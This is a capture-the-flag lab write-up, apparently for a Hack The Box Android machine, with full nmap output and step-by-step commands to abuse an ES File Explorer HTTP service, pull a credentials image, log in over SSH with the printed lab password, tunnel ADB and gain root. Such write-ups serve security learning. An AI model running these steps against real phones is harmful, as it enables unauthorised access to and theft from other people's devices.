┌─[gabrielle@parrot]─[~]└──╼ $sudo nmap-T4-sC-sV-O-Pn-p-10.10.10.247[sudo] password for gabrielle: StartingNmap7.92 ( https://nmap.org ) at 2023-02-04 11:26 ESTNmapscanreportfor10.10.10.247Hostisup (0.027s latency).Notshown:65530closedtcpports (reset)PORTSTATESERVICEVERSION2222/tcpopenssh (protocol 2.0)|fingerprint-strings:|NULL:|_SSH-2.0-SSHServer-BananaStudio|ssh-hostkey:|_204871:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)5555/tcpfilteredfreeciv37827/tcpopenunknown|fingerprint-strings:|GenericLines:|HTTP/1.0400BadRequest|Date:Sat,04Feb202316:27:03GMT|Content-Length:22|Content-Type:text/plain; charset=US-ASCII|Connection:Close|Invalidrequestline:|GetRequest:|HTTP/1.1412PreconditionFailed|Date:Sat,04Feb202316:27:03GMT|Content-Length:0|HTTPOptions:|HTTP/1.0501NotImplemented|Date:Sat,04Feb202316:27:08GMT|Content-Length:29|Content-Type:text/plain; charset=US-ASCII|Connection:Close|Methodnotsupported:OPTIONS|Help:|HTTP/1.0400BadRequest|Date:Sat,04Feb202316:27:23GMT|Content-Length:26|Content-Type:text/plain; charset=US-ASCII|Connection:Close|Invalidrequestline:HELP|RTSPRequest:|HTTP/1.0400BadRequest|Date:Sat,04Feb202316:27:08GMT|Content-Length:39|Content-Type:text/plain; charset=US-ASCII|Connection:Close|validprotocolversion:RTSP/1.0|SSLSessionReq:|HTTP/1.0400BadRequest|Date:Sat,04Feb202316:27:23GMT|Content-Length:73|Content-Type:text/plain; charset=US-ASCII|Connection:Close|Invalidrequestline:|?G???,???`~?|??{????w????<=?o?|TLSSessionReq:|HTTP/1.0400BadRequest|Date:Sat,04Feb202316:27:23GMT|Content-Length:71|Content-Type:text/plain; charset=US-ASCII|Connection:Close|Invalidrequestline:|??random1random2random3random4|TerminalServerCookie:|HTTP/1.0400BadRequest|Date:Sat,04Feb202316:27:23GMT|Content-Length:54|Content-Type:text/plain; charset=US-ASCII|Connection:Close|Invalidrequestline:|_Cookie:mstshash=nmap42135/tcpopenhttpESFileExplorerNameResponsehttpd|_http-title:Sitedoesn't have a title (text/html).59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older|_http-title: Site doesn'thaveatitle (text/plain).2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXTSERVICEFINGERPRINT (SUBMIT INDIVIDUALLY)==============SF-Port2222-TCP:V=7.92%I=7%D=2/4%Time=63DE8756%P=x86_64-pc-linux-gnu%r(NULSF:L,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");==============NEXTSERVICEFINGERPRINT (SUBMIT INDIVIDUALLY)==============SF-Port37827-TCP:V=7.92%I=7%D=2/4%Time=63DE8755%P=x86_64-pc-linux-gnu%r(GeSF:nericLines,AA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Sat,\x200SF:4\x20Feb\x202023\x2016:27:03\x20GMT\r\nContent-Length:\x2022\r\nContentSF:-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\rSF:\nInvalid\x20request\x20line:\x20")%r(GetRequest,5C,"HTTP/1\.1\x20412\xSF:20Precondition\x20Failed\r\nDate:\x20Sat,\x2004\x20Feb\x202023\x2016:27SF::03\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(HTTPOptions,B5,"HTTP/1\.SF:0\x20501\x20Not\x20Implemented\r\nDate:\x20Sat,\x2004\x20Feb\x202023\x2SF:016:27:08\x20GMT\r\nContent-Length:\x2029\r\nContent-Type:\x20text/plaiSF:n;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r\nMethod\x20not\x20SF:supported:\x20OPTIONS")%r(RTSPRequest,BB,"HTTP/1\.0\x20400\x20Bad\x20ReSF:quest\r\nDate:\x20Sat,\x2004\x20Feb\x202023\x2016:27:08\x20GMT\r\nConteSF:nt-Length:\x2039\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r\SF:nConnection:\x20Close\r\n\r\nNot\x20a\x20valid\x20protocol\x20version:\SF:x20\x20RTSP/1\.0")%r(Help,AE,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDatSF:e:\x20Sat,\x2004\x20Feb\x202023\x2016:27:23\x20GMT\r\nContent-Length:\xSF:2026\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection:SF:\x20Close\r\n\r\nInvalid\x20request\x20line:\x20HELP")%r(SSLSessionReq,SF:DD,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Sat,\x2004\x20Feb\x2SF:02023\x2016:27:23\x20GMT\r\nContent-Length:\x2073\r\nContent-Type:\x20tSF:ext/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r\nInvalid\xSF:20request\x20line:\x20\x16\x03\0\0S\x01\0\0O\x03\0\?G\?\?\?,\?\?\?`~\?\SF:0\?\?{\?\?\?\?w\?\?\?\?<=\?o\?\x10n\0\0\(\0\x16\0\x13\0")%r(TerminalSerSF:verCookie,CA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Sat,\x2004SF:\x20Feb\x202023\x2016:27:23\x20GMT\r\nContent-Length:\x2054\r\nContent-SF:Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r\SF:nInvalid\x20request\x20line:\x20\x03\0\0\*%\?\0\0\0\0\0Cookie:\x20mstshSF:ash=nmap")%r(TLSSessionReq,DB,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDaSF:te:\x20Sat,\x2004\x20Feb\x202023\x2016:27:23\x20GMT\r\nContent-Length:\SF:x2071\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnectionSF::\x20Close\r\n\r\nInvalid\x20request\x20line:\x20\x16\x03\0\0i\x01\0\0eSF:\x03\x03U\x1c\?\?random1random2random3random4\0\0\x0c\0/\0");No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=7.92%E=4%D=2/4%OT=2222%CT=1%CU=34246%PV=Y%DS=2%DC=I%G=Y%TM=63DE87OS:C0%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)SEQOS:(SP=FE%GCD=1%ISR=10E%TI=Z%CI=Z%TS=A)OPS(O1=M539ST11NW6%O2=M539ST11NW6%O3OS:=M539NNT11NW6%O4=M539ST11NW6%O5=M539ST11NW6%O6=M539ST11)WIN(W1=FFFF%W2=FOS:FFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=Y%T=40%W=FFFF%O=M539NNSNWOS:6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DFOS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIOS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)Network Distance: 2 hopsService Info: Device: phoneOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 136.00 seconds
Port 2222
If we lookup for exploit for this specific Banana studio ssh service, we find this exploit. Seems to have been made for this specific box. So I will not use it. Plus it seems to require a password for ssh authentication so not really useful anyway.
Port 5555
If we search about this port, it turns out to be adb service. We can find out more about it here.
Let's install adb if we do not have it yet sudo apt install android-tools-adb
adb connect 10.10.10.247:5555
Kinda stuck here so moving to another port
ES File explorer
This one is an http port. Let's look it up and see if we find anything.
Looking at the code we can see we have the following commands for the exploit
print("Available commands : ")print(" listFiles : List all Files.")print(" listPics : List all Pictures.")print(" listVideos : List all videos.")print(" listAudios : List all audios.")print(" listApps : List Applications installed.")print(" listAppsSystem : List System apps.")print(" listAppsPhone : List Communication related apps.")print(" listAppsSdcard : List apps on the SDCard.")print(" listAppsAll : List all Application.")print(" getFile : Download a file.")print(" getDeviceInfo : Get device info.")
So I tried the following commands (output is stripped for more readability)
Bingo here! we have a creds.jpg image. Let's download it
mv out.dat creds.jpg we rename the outfile xdg-open creds.jpg we open it
And we get a password along with a user name. kristi:Kr1sT!5h@Rp3xPl0r3!
ssh kristi@10.10.10.247 -P 2222 let's try to ssh with the creds provided
It works
We can find the user find in sdcard
Privilege escalation
Let's make an ssh tunnel ssh -NL 5556:localhost:5554 -L 5557:localhost:5555 -p 2222 kristi@10.10.10.247 this way we can use adb through this tunnel (I followed this tutorial for the setup)
In another tab we run killall adb
and then adb devices we see our target is listed
Now let's try to root with adb root it works
Let's search the root flag find / -type f -name "root.txt" 2>/dev/null
